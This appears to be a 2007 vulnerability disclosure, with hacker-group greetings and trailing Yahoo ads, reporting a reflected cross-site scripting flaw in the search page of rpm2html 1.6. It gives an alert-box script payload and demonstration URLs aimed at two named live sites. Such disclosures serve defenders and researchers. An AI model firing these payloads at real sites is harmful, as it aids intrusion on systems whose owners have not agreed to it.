----------------------------------------------------------------------|
My Name: Vladiii |
My Country: Romania |
My Site: http://www.rstzone.net |
My Team: I hope to enter in RST-Crew :) |
Contact me: [email protected] |
Special Shoutz: kw3rln (fluffy_bunny), flo_flow_supremacy, mozi2weed, |
& all RST-crew & RSB-team Members. |
----------------------------------------------------------------------|
Vulnerable code: rpm2html 1.6 |
Download it from: http://public.www.planetmirror.com/pub/rpm2html/ |
---|
XSS Vulnerability in search function :) |
Details: we can change the query in URL with <script>alert('xss')</script> |
and will appear a Message Box with our code :)
Demonstration: http://vulerablesite.com/path/rpm2html[path]/search.php?query=<script>alert('xss')</script>&blabla
Live demonstration: http://rpms.mandrivaclub.com/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&submit=Search+…
http://rpmfind.net/linux/rpm2html/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E
POC !
vladiii 2007
We won't tell. Get more on shows you hate to love
(and love to hate): Yahoo! TV's Guilty Pleasures list.
Now that's room service! Choose from over 150,000 hotels
in 45,000 destinations on Yahoo! Travel to find your fit.